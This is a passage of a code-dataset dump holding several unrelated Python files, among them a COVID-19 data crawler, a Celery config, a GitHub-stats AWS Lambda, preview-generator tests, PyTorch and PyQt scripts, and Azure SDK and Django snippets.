= document['continentEnglishName']\n except KeyError:\n result['continentName'] = None\n result['continentEnglishName'] = None\n\n result['countryName'] = document['countryName']\n\n try:\n result['countryEnglishName'] = document['countryEnglishName']\n except KeyError:\n result['countryEnglishName'] = None\n\n result['provinceName'] = document['provinceName']\n result['provinceEnglishName'] = document.get('provinceEnglishName')\n result['province_zipCode'] = document.get('locationId')\n result['province_confirmedCount'] = document['confirmedCount']\n result['province_suspectedCount'] = document['suspectedCount']\n result['province_curedCount'] = document['curedCount']\n result['province_deadCount'] = document['deadCount']\n\n if city_dict:\n result['cityName'] = city_dict['cityName']\n result['cityEnglishName'] = city_dict.get('cityEnglishName')\n result['city_zipCode'] = city_dict.get('locationId')\n result['city_confirmedCount'] = city_dict['confirmedCount']\n result['city_suspectedCount'] = city_dict['suspectedCount']\n result['city_curedCount'] = city_dict['curedCount']\n result['city_deadCount'] = city_dict['deadCount']\n\n result['updateTime'] = datetime.datetime.fromtimestamp(int(document['updateTime']/1000))\n\n return result\n\n#处理git相关日志消息\ndef git_manager(changed_files):\n repo = Repo(path=os.path.split(os.path.realpath(__file__))[0])\n repo.index.add(changed_files)\n repo.index.commit(message='{datetime} - Change detected!'.format(datetime=datetime.datetime.now()))\n origin = repo.remote('origin')\n origin.push()\n logger.info('Pushing to GitHub successfully!')\n\n\nclass DB:\n def __init__(self):\n self.db = db\n self.cursor = db.cursor()\n\n def count(self, collection):\n return self.db[collection].count_documents(filter={})\n\n # def dump(self, collection):\n # return self.db[collection].aggregate(\n # pipeline=[\n # {\n # '$sort': {\n # 'updateTime': -1,\n # 'crawlTime': -1\n # }\n # }\n # ],\n # allowDiskUse=True\n # )\n\n def list_table(self):\n self.cursor.execute(\"show tables\")\n table_list = [tuple[0] for tuple in self.cursor.fetchall()]\n return table_list\n\n\n\nclass Listener:\n def __init__(self):\n self.db = db\n self.cursor=self.db.cursor()\n\n def list_table(self):\n self.cursor.execute(\"show tables\")\n table_list = [tuple[0] for tuple in self.cursor.fetchall()]\n return table_list\n\n def run(self):\n while True:\n self.listener()\n time.sleep(60)\n\n def listener(self):\n changed_files = list()\n tables=self.list_table()\n pos=[0 for i in range(4)]\n for table in tables:\n if table=='migration' or table=='user' or table=='dxyoverall':\n continue\n #将大小写转化成对应格式,即前四个字母大写\n a=table[0].upper()\n b=table[1].upper()\n c=table[2].upper()\n d=table[3].upper()\n e=table[4:]\n table=a+b+c+d+e\n\n\n json_file = open(\n os.path.join(\n os.path.split(os.path.realpath(__file__))[0], 'json', table + '.json'),#这块如果报错可能是因为大小写\n 'r', encoding='utf-8'\n )\n try:\n static_data = json.load(json_file)\n except (UnicodeDecodeError, FileNotFoundError, json.decoder.JSONDecodeError):\n static_data = None\n json_file.close()\n while True:\n str=collections.get(table)\n request = requests.get(url='https://lab.isaaclin.cn/nCoV/api/' + collections.get(table))#此处是爬虫\n if request.status_code == 200:\n current_data = request.json()\n break\n else:\n time.sleep(1)\n continue\n\n #爬虫爬取信息完毕,下面开始导入数据库\n # if static_data != current_data:#数据存在更新\n # self.json_dumper(collection=table, content=current_data)\n # changed_files.append('json/' + table + '.json')\n # self.mysql_dumper(table,current_data)\n if table=='DXYNews':self.mysql_dumper(table, current_data)#如果哪一个表觉得数据不够,可以把这句话取消注释来导入数据\n logger.info('{collection} checked!'.format(collection=table))\n\n # #下面造一个数据进行测试\n # test_data=[{\n # \"pubDate\": \"1591438030000\",\n # \"title\": \"139天!邱海波终于回家了\",\n # \"summary\": \"从严冬到酷暑,从江苏到湖北,再转战黑龙江、吉林,著名重症医学专家、东南大学附属中大医院党委副书记邱海波,抗疫 139 天后,于 6 月 5 日下午从吉林平安返回南京。在他返回的前两天,6 月 3 日,吉林省舒兰市风险等级由高风险调整为低风险。看到邱海波回家,网友纷纷致敬:「辛苦了,好好休息休息!」\",\n # \"infoSource\": \"央视新闻app\",\n # \"sourceUrl\": \"http://app.cctv.com/special/cportal/detail/arti/index.html?id=ArtiTFBarRzB87SoCXeAwJXV200606&isfromapp=1\",\n # \"province\": 'null',\n # \"provinceId\": \"\"\n # }]\n #\n # self.mysql_dumper(table, test_data)\n # if changed_files:\n # git_manager(changed_files=changed_files)\n\n def json_dumper(self, collection, content=None):\n json_file = open(\n os.path.join(\n os.path.split(\n os.path.realpath(__file__))[0], 'json', collection + '.json'\n ),\n 'w', encoding='utf-8'\n )\n json.dump(content, json_file, ensure_ascii=False, indent=4)\n json_file.close()\n\n def csv_dumper(self, collection, cursor):\n if collection == 'DXYArea':#这块之后的大小写要改一下\n structured_results = list()\n for document in cursor:\n if document.get('cities', None):\n for city_counter in range(len(document['cities'])):\n city_dict = document['cities'][city_counter]\n structured_results.append(dict_parser(document=document, city_dict=city_dict))\n else:\n structured_results.append(dict_parser(document=document))\n\n df = pd.DataFrame(structured_results)\n df.to_csv(\n path_or_buf=os.path.join(\n os.path.split(os.path.realpath(__file__))[0], 'csv', collection + '.csv'),\n index=False, encoding='utf_8_sig', float_format=\"%i\"\n )\n else:\n df = pd.DataFrame(data=cursor)\n for time_type in time_types:\n if time_type in df.columns:\n df[time_type] = df[time_type].apply(lambda x: datetime.datetime.fromtimestamp(x / 1000) if not pd.isna(x) else '')\n df.to_csv(\n path_or_buf=os.path.join(\n os.path.split(os.path.realpath(__file__))[0], 'csv', collection + '.csv'),\n index=False, encoding='utf_8_sig', date_format=\"%Y-%m-%d %H:%M:%S\"\n )\n\n def db_dumper(self, collection, cursor):\n data = list()#初始化一个列表\n for document in cursor:\n document.pop('_id')\n data.append(document)\n\n json_file = open(\n os.path.join(\n os.path.split(\n os.path.realpath(__file__))[0], 'json', collection + '-TimeSeries.json'\n ),\n 'w', encoding='utf-8'\n )\n json.dump(data, json_file, ensure_ascii=False, indent=4)\n json_file.close()\n\n def mysql_dumper(self,table,da):#current_data是一个json文件,字典套列表套字典\n if table == 'DXYNews':\n sql = \"insert into \" + table + \" values(%s,%s,%s,%s,%s,%s,%s)\"\n for item in da['results']: # 只导最新一条新闻\n value = (item[\"pubDate\"], item[\"title\"], item[\"summary\"], item[\"infoSource\"],\n item[\"sourceUrl\"], item[\"province\"], item[\"provinceId\"])\n self.cursor.execute(sql, value)\n self.db.commit()\n elif table== 'DXYArea':\n sql = \"insert into \" + table + \" values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n for item in da['results']: # 只导最新一条新闻\n value = (item[\"locationId\"], item[\"continentName\"],item[\"continentEnglishName\"], item[\"countryName\"],\n item[\"countryEnglishName\"], item[\"countryFullName\"], item[\"provinceName\"],item[\"provinceEnglishName\"],\n item[\"provinceShortName\"], item[\"currentConfirmedCount\"], item[\"confirmedCount\"], item[\"suspectedCount\"],\n item[\"curedCount\"], item[\"deadCount\"], item[\"comment\"], item[\"cities\"], item[\"updateTime\"])\n self.cursor.execute(sql, value)\n self.db.commit()\n elif table== 'DXYRumors':\n sql = \"insert into \" + table + \" values(%s,%s,%s,%s)\"\n for item in da['results']: # 只导最新一条新闻\n value = (item[\"title\"], item[\"mainSummary\"], item[\"body\"], item[\"sourceUrl\"])\n self.cursor.execute(sql, value)\n self.db.commit()\n\n\n \n \n\n\n\n\nif __name__ == '__main__':\n listener = Listener()\n listener.run()\n","sub_path":"yii/疫情数据爬虫/DXY-COVID-19-Data-master/test1.pyw","file_name":"test1.pyw","file_ext":"pyw","file_size_in_byte":10797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"265259470","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass GalleryImageVersionStorageProfile(Model):\n \"\"\"This is the storage profile of a gallery Image Version.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar os_disk_image:\n :vartype os_disk_image:\n ~azure.mgmt.compute.v2019_03_01.models.GalleryOSDiskImage\n :ivar data_disk_images: A list of data disk images.\n :vartype data_disk_images:\n list[~azure.mgmt.compute.v2019_03_01.models.GalleryDataDiskImage]\n \"\"\"\n\n _validation = {\n 'os_disk_image': {'readonly': True},\n 'data_disk_images': {'readonly': True},\n }\n\n _attribute_map = {\n 'os_disk_image': {'key': 'osDiskImage', 'type': 'GalleryOSDiskImage'},\n 'data_disk_images': {'key': 'dataDiskImages', 'type': '[GalleryDataDiskImage]'},\n }\n\n def __init__(self, **kwargs):\n super(GalleryImageVersionStorageProfile, self).__init__(**kwargs)\n self.os_disk_image = None\n self.data_disk_images = None\n","sub_path":"azure-mgmt-compute/azure/mgmt/compute/v2019_03_01/models/gallery_image_version_storage_profile.py","file_name":"gallery_image_version_storage_profile.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"141540811","text":"import os\nfrom celery.schedules import crontab\n\n# This broker acts a middleman sending and receiving messages to workers who in turn process tasks as they receive them.\nBROKER_URL = 'amqp://guest:guest@localhost:5672//'\n# Backend is used to keep track of task state and results.\nCELERY_RESULT_BACKEND = 'amqp://guest:guest@localhost:5672//'\nCELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml']\nCELERY_TIMEZONE = 'Europe/Oslo'\nCELERYBEAT_SCHEDULE = {\n 'every-minute': {\n 'task': 'celery_tasks.notifications_strotimer.send_notifications_strotimer_task',\n 'schedule': crontab(minute='*/60')\n },\n}\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_ENABLE_UTC = False\n# You can tell celery to run the task in sync by adding this,\n# this is only meant to be in use for debugging or development stages!\nif os.environ.get('DEBUG', True):\n\tCELERY_ALWAYS_EAGER = True","sub_path":"flod_booking/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"476438685","text":"from typing import List\n\n\nfrom components.access_to_disk_.algorithms.algorithm import Algorithm\n\n\nclass FCFS(Algorithm):\n\n def execute(self) -> (List[int], int):\n \"\"\"\n Execute FCFS Algorithm\n :return: queue, rewound cylinders\n \"\"\"\n while True:\n # first execute real_time if they are\n if self.rt_requests:\n to_queue = self.rt_requests[0].block\n self.rt_requests = self.rt_requests[1:]\n # if no real time, execute normal\n elif self.requests:\n to_queue = self.requests[0].block\n self.requests = self.requests[1:]\n # after executing all processes break\n else:\n break\n self.rewound += self.calculate_rewound(to_queue)\n self.queue.append(to_queue)\n return self.queue, self.rewound\n\n def get_name(self) -> str:\n return \"FCFS\"","sub_path":"Lab5.5/components/access_to_disk_/algorithms/fcfs.py","file_name":"fcfs.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640601896","text":"# -*- coding: utf8 -*-\nfrom create_cases import list_of_cases_to_find_doubles, fault_cases\nfrom cases import Case, CaseAllEq\nfrom xl_to_add_to_acts import cases_form_xls_from_base\n\n\n# format: {num: [Case Instance, ...]}\ndouble_cases_dic = {}\ndouble_cases = set()\nunique_cases_with_repetitions = set()\n\n# Find unique and double cases from stocktaking.\nfor case in list_of_cases_to_find_doubles:\n if case in unique_cases_with_repetitions:\n unique_cases_with_repetitions.remove(case)\n double_cases.add(case)\n else:\n unique_cases_with_repetitions.add(case)\n\nfor case in list_of_cases_to_find_doubles:\n if case in double_cases:\n if not isinstance(case.num, dict) and not isinstance(case.year, dict):\n key = case.num + \"_\" + case.year\n if key in double_cases_dic:\n case_from_dic = double_cases_dic[key][0]\n if not case.is_equal(case_from_dic):\n double_cases_dic[key].append(case)\n else:\n double_cases_dic[key] = [case]\n\nraw_unique_cases = set([Case(x.num, x.year, x.service, x.region) for x in unique_cases_with_repetitions])\nintersected = raw_unique_cases.intersection(cases_form_xls_from_base)\nunique_cases = raw_unique_cases.union(cases_form_xls_from_base)\n\nfor case in fault_cases:\n key = case.num + \"_\" + case.year\n try:\n list_of_cases = double_cases_dic.pop(key)\n for case_dub in list_of_cases:\n case_to_compare = CaseAllEq(case_dub.num, case_dub.year, case_dub.service, case_dub.region)\n if case_to_compare != case:\n new_unique_case = Case(case_to_compare.num, case_to_compare.year, case_to_compare.service,\n case_to_compare.region)\n unique_cases.add(new_unique_case)\n except KeyError:\n pass\n #print \"{0} is already removed from doubles\".format(key)","sub_path":"find_doubles.py","file_name":"find_doubles.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"427102208","text":"from django.conf.urls import url, patterns, include, handler404\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.template import Template, Context\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\n\ndef test_view(request, item_slug):\n pslug = request.POST['pslug']\n N = request.POST['N']\n t = Template('{% load treenav_tags %}{% single_level_menu pslug N %}')\n c = Context({\n \"request\": request,\n \"pslug\": pslug,\n \"N\": N,\n })\n return HttpResponse(t.render(c))\n\n\ndef test_404(request):\n return HttpResponseNotFound()\n\n\nhandler404 = test_404 # noqa\n\n\nurlpatterns = patterns('', # noqa\n url(r'^admin/', include(admin.site.urls)),\n url(r'^item/(?P[\\w-]+)/$', test_view, name='test_view'),\n url(r'^old/', include('treenav.urls')),\n)\n","sub_path":"treenav/tests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"487408215","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport shutil\nimport typing\n\nfrom PIL import Image\nimport pytest\n\nfrom preview_generator.exception import UnavailablePreviewType\nfrom preview_generator.preview.builder.image__cairosvg import ImagePreviewBuilderCairoSVG\nfrom preview_generator.utils import ImgDims\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nCACHE_DIR = \"/tmp/preview-generator-tests/cache/\"\nTEST_FILES = [\n {\n \"name\": \"tesselation-P3.svg\",\n \"width\": 181,\n \"height\": 256,\n \"width_default\": 181,\n \"height_default\": 256,\n },\n {\n \"name\": \"Ghostscript_Tiger.svg\",\n \"width\": 256,\n \"height\": 256,\n \"width_default\": 256,\n \"height_default\": 256,\n },\n {\n \"name\": \"14224-tiger-svg.svg\",\n \"width\": 419,\n \"height\": 256,\n \"width_default\": 256,\n \"height_default\": 156,\n },\n]\n\n\ndef setup_function(function: typing.Callable) -> None:\n shutil.rmtree(CACHE_DIR, ignore_errors=True)\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_jpeg(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n assert builder.has_jpeg_preview() is True\n size = ImgDims(height=256, width=512)\n preview_name = \"svg_tesselation_test_cairosvg\"\n builder.build_jpeg_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n size=size,\n page_id=0,\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n path_to_file = os.path.join(CACHE_DIR, \"{}.jpg\".format(preview_name))\n assert os.path.exists(path_to_file) is True\n assert os.path.getsize(path_to_file) > 0\n\n with Image.open(path_to_file) as jpeg:\n assert jpeg.height == file[\"height\"]\n assert jpeg.width == file[\"width\"]\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_get_nb_page(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n nb_page = builder.get_page_number(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n assert nb_page == 1\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_json(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n assert builder.has_json_preview() is True\n builder.build_json_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n path_to_file = os.path.join(CACHE_DIR, \"{}.json\".format(preview_name))\n\n assert os.path.exists(path_to_file)\n assert os.path.getsize(path_to_file) > 0\n\n data = json.load(open(path_to_file))\n assert \"File:FileName\" in data.keys()\n assert \"SVG:Xmlns\" in data.keys()\n assert \"File:FileTypeExtension\" in data.keys()\n assert \"SourceFile\" in data.keys()\n assert \"File:FileInodeChangeDate\" in data.keys()\n assert \"File:Directory\" in data.keys()\n assert \"File:FileAccessDate\" in data.keys()\n assert \"ExifTool:ExifToolVersion\" in data.keys()\n assert \"File:FileSize\" in data.keys()\n assert \"File:FilePermissions\" in data.keys()\n assert \"File:FileModifyDate\" in data.keys()\n assert \"File:FileType\" in data.keys()\n assert \"File:MIMEType\" in data.keys()\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_pdf(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n assert builder.has_pdf_preview() is True\n builder.build_pdf_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n path_to_file = os.path.join(CACHE_DIR, \"{}.pdf\".format(preview_name))\n assert os.path.exists(path_to_file)\n assert os.path.getsize(path_to_file) > 0\n\n\n@pytest.mark.parametrize(\"file\", TEST_FILES)\ndef test_to_text(file: typing.Dict[str, typing.Any]) -> None:\n os.makedirs(CACHE_DIR)\n builder = ImagePreviewBuilderCairoSVG()\n preview_name = \"svg_tesselation_test_cairosvg\"\n assert builder.has_text_preview() is False\n with pytest.raises(UnavailablePreviewType):\n builder.build_text_preview(\n file_path=os.path.join(CURRENT_DIR, file[\"name\"]),\n cache_path=CACHE_DIR,\n preview_name=preview_name,\n )\n","sub_path":"tests/input/svg/test_svg_cairosvg.py","file_name":"test_svg_cairosvg.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"143875577","text":"from test06 import dataset\nfrom torch.utils import data\nimport torch\nimport torchvision\nfrom PIL import Image,ImageDraw\nfrom myNet import Net\nfrom torch.utils import data\nimport torch.nn as nn\nimport numpy as np\nif __name__ == '__main__':\n data_set = dataset(\"test_pic2\")\n # shuffle 打乱数据之间的连续性\n # batch_size 一次所取的数据 这里一次取100张图片\n # 使用数据加载器,从dataset中打乱取数据\n train_data=data.DataLoader(dataset=data_set,batch_size=100\n ,shuffle=True)\n\n #net = Net()\n net = torch.load(\"1.pth\")\n # 计算损失函数\n loss_func = nn.MSELoss()\n # 利用梯度下降优化所有的参数 lr:步长\n # optimizer = torch.optim.SGD(net.parameters(),lr=0.01)\n # optimizer = torch.optim.Adam(net.parameters())\n for epoch in range(1000):\n # 用枚举的形式获得下标,index\n # x:数据 y:标签\n for i, (x, y) in enumerate(train_data):\n # 将x做形状变化,2828化成764*(一维)\n\n x = x.view(-1, 300*300*3) # 其中-1代表剩余的部分\n out = net(x)\n # 将标签变成one-hot形式\n x = x.view(-1, 300,300, 3)\n out=out.detach().numpy()*300\n y =y.detach().numpy()*300\n print(out[0])\n img_data = np.array((x[0]+0.5)*255,dtype=np.int8)\n img = Image.fromarray(img_data,\"RGB\")\n draw = ImageDraw.Draw(img)\n draw.rectangle(out[0],outline=\"red\",width=2)\n draw.rectangle(y[0], outline=\"green\", width=2)\n print(y[0])\n img.show()\n\n # # 传入损失\n # loss = loss_func(out, y)\n #\n # # 梯度下降步骤\n # optimizer.zero_grad() # 清空梯度\n # loss.backward() # 自动求导\n # optimizer.step() # 更新梯度\n\n # if i % 10 == 0:\n # # out_put = torch.argmax(out, dim=1)\n # print(loss)\n #\n # # print(\"target:\",target)\n # # print(\"out:\",out_put)\n # acc = np.mean(np.sum(out.detach().numpy()==y.numpy(),axis=1)==4);\n # print(acc)\n # torch.save(net, \"1.pth\")","sub_path":"location-to-man/test07.py","file_name":"test07.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"603711497","text":"\"\"\"\nThis is a sample script which connects to to GitHub account via PyGithub library using token and collect repository details into a csv file and store/append the csv file on the AWS bucket.\n\"\"\"\nimport boto3, csv, datetime, pytz\nfrom github_module_methods.repo_stats import Repo_Stat\nimport conf.git_stat_conf as conf\n\n\n#----START OF SCRIPT in Lambda function---\ndef lambda_handler(event, context):\n s3 = boto3.client('s3')\n\n #Collecting paths and bucket name from conf file\n global lambda_temp_file\n lambda_temp_file = conf.lambda_temp_file\n my_s3_bucket = conf.s3_bucket_name\n s3_csv_file = conf.s3_csv_file\n\n #Download s3 csv file to lambda tmp folder. If csv is not exist in s3, create a csv file in temp folder\n response = s3.list_objects_v2(Bucket=my_s3_bucket, Prefix=s3_csv_file)\n if response.get('Contents'):\n s3.download_file(my_s3_bucket, s3_csv_file, lambda_temp_file)\n else:\n csv.writer(open(lambda_temp_file, \"w+\"))\n\n #Creating an instance of the class\n test_obj = Repo_Stat(conf.token)\n repositories = conf.repositories\n\n #Converting GMT date time to IST date time since the lambda function uses GMT time standard\n date = datetime.datetime.today()\n zone = pytz.timezone('Asia/Kolkata')\n date_ist = date.astimezone(zone)\n today_date = date_ist.strftime(\"%Y-%m-%d\")\n date_time = date_ist.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n #Opening csv file from lambda tmp folder.\n with open(lambda_temp_file, 'a+', newline='') as f:\n write = csv.writer(f, delimiter=',')\n\n #If header row is not available, write the header row.\n if f.tell() == 0:\n write.writerow(['Repository', 'Date', 'Starts', 'Forks', 'Today\\'s Clones', 'Today\\'s Unique Clones', 'Today\\'s Views', 'Today\\'s Unique Visitors', 'Fortnight Clones', 'Fortnight Unique Clones', 'Fortnight Views', 'Fortnight unique Views'])\n\n for repository in repositories:\n stars = test_obj.get_repo_stars(repository)\n forks = test_obj.get_repo_forks(repository)\n clone_dict, clone_count, unique_clone_count = test_obj.get_repo_clone(repository, today_date)\n visitors_dict, view_count, unique_visitors = test_obj.get_repo_views(repository, today_date)\n\n #Writing the collected values to csv file\n write.writerow([repository, date_time, stars, forks, clone_count, unique_clone_count, view_count, unique_visitors, clone_dict['count'], clone_dict['uniques'], visitors_dict['count'], visitors_dict['uniques']])\n\n #Upload the lambda temp file to s3 bucket\n s3.upload_file(lambda_temp_file, my_s3_bucket, s3_csv_file)\n\n return {\n 'message': 'success!!'\n }","sub_path":"test_to_run_on_lambda_funtion/collect_git_repo_stats_via_lambda.py","file_name":"collect_git_repo_stats_via_lambda.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412631091","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom definition import Definition\r\nfrom synonyms import Synonyms\r\nfrom antonym import Antonyms\r\nfrom sentences import Sentences\r\nfrom phonetics import Phonetics\r\nfrom dbConnect import DbConnect\r\nimport re\r\n\r\n\r\nclass Fetch_All(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(800, 600)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.head_label = QtWidgets.QLabel(self.centralwidget)\r\n self.head_label.setGeometry(QtCore.QRect(10, 10, 191, 16))\r\n self.head_label.setAutoFillBackground(True)\r\n self.head_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.head_label.setObjectName(\"head_label\")\r\n self.word_label = QtWidgets.QLabel(self.centralwidget)\r\n self.word_label.setGeometry(QtCore.QRect(40, 60, 41, 16))\r\n self.word_label.setObjectName(\"word_label\")\r\n self.word_line_edit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.word_line_edit.setGeometry(QtCore.QRect(90, 60, 181, 20))\r\n self.word_line_edit.setObjectName(\"word_line_edit\")\r\n self.defn_label = QtWidgets.QLabel(self.centralwidget)\r\n self.defn_label.setGeometry(QtCore.QRect(10, 120, 61, 16))\r\n self.defn_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n self.defn_label.setObjectName(\"defn_label\")\r\n self.defn_text_label = QtWidgets.QLabel(self.centralwidget)\r\n self.defn_text_label.setGeometry(QtCore.QRect(90, 120, 691, 101))\r\n self.defn_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.defn_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n self.defn_text_label.setWordWrap(True)\r\n self.defn_text_label.setObjectName(\"defn_text_label\")\r\n self.syn_label = QtWidgets.QLabel(self.centralwidget)\r\n self.syn_label.setGeometry(QtCore.QRect(10, 350, 61, 16))\r\n self.syn_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n self.syn_label.setObjectName(\"syn_label\")\r\n self.syn_text_label = QtWidgets.QLabel(self.centralwidget)\r\n self.syn_text_label.setGeometry(QtCore.QRect(90, 350, 691, 61))\r\n self.syn_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.syn_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n self.syn_text_label.setWordWrap(True)\r\n self.syn_text_label.setObjectName(\"syn_text_label\")\r\n self.antonym_text_label = QtWidgets.QLabel(self.centralwidget)\r\n self.antonym_text_label.setGeometry(QtCore.QRect(90, 430, 691, 31))\r\n self.antonym_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.antonym_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n self.antonym_text_label.setWordWrap(True)\r\n self.antonym_text_label.setObjectName(\"antonym_text_label\")\r\n self.ant_label = QtWidgets.QLabel(self.centralwidget)\r\n self.ant_label.setGeometry(QtCore.QRect(10, 430, 61, 16))\r\n self.ant_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n self.ant_label.setObjectName(\"ant_label\")\r\n self.phn_text_label = QtWidgets.QLabel(self.centralwidget)\r\n self.phn_text_label.setGeometry(QtCore.QRect(90, 480, 691, 21))\r\n self.phn_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.phn_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n self.phn_text_label.setWordWrap(True)\r\n self.phn_text_label.setObjectName(\"phn_text_label\")\r\n self.phn_label = QtWidgets.QLabel(self.centralwidget)\r\n self.phn_label.setGeometry(QtCore.QRect(10, 480, 61, 16))\r\n self.phn_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n self.phn_label.setObjectName(\"phn_label\")\r\n self.sent_label = QtWidgets.QLabel(self.centralwidget)\r\n self.sent_label.setGeometry(QtCore.QRect(10, 230, 61, 16))\r\n self.sent_label.setFrameShape(QtWidgets.QFrame.Panel)\r\n self.sent_label.setObjectName(\"sent_label\")\r\n self.sent_text_label = QtWidgets.QLabel(self.centralwidget)\r\n self.sent_text_label.setGeometry(QtCore.QRect(90, 230, 691, 111))\r\n self.sent_text_label.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.sent_text_label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)\r\n self.sent_text_label.setWordWrap(True)\r\n self.sent_text_label.setObjectName(\"sent_text_label\")\r\n self.search_bttn = QtWidgets.QPushButton(self.centralwidget)\r\n self.search_bttn.setGeometry(QtCore.QRect(290, 60, 75, 23))\r\n self.search_bttn.setObjectName(\"search_bttn\")\r\n self.save_bttn = QtWidgets.QPushButton(self.centralwidget)\r\n self.save_bttn.setGeometry(QtCore.QRect(400, 510, 101, 23))\r\n self.save_bttn.setObjectName(\"save_bttn\")\r\n self.close_bttn = QtWidgets.QPushButton(self.centralwidget)\r\n self.close_bttn.setGeometry(QtCore.QRect(320, 510, 75, 23))\r\n self.close_bttn.setObjectName(\"close_bttn\")\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n self.search_bttn.clicked.connect(self.fetch_all_info)\r\n self.close_bttn.clicked.connect(MainWindow.close)\r\n self.save_bttn.clicked.connect(self.save_words)\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\r\n self.head_label.setText(_translate(\"MainWindow\", \"Fetch all information about the word \"))\r\n self.word_label.setText(_translate(\"MainWindow\", \"Word\"))\r\n self.word_line_edit.setPlaceholderText(_translate(\"MainWindow\", \"Please enter your word here\"))\r\n self.defn_label.setText(_translate(\"MainWindow\", \"Definition\"))\r\n self.defn_text_label.setText(_translate(\"MainWindow\", \"Definition\"))\r\n self.syn_label.setText(_translate(\"MainWindow\", \"Synonyms\"))\r\n self.syn_text_label.setText(_translate(\"MainWindow\", \"Synonym\"))\r\n self.antonym_text_label.setText(_translate(\"MainWindow\", \"Antonym\"))\r\n 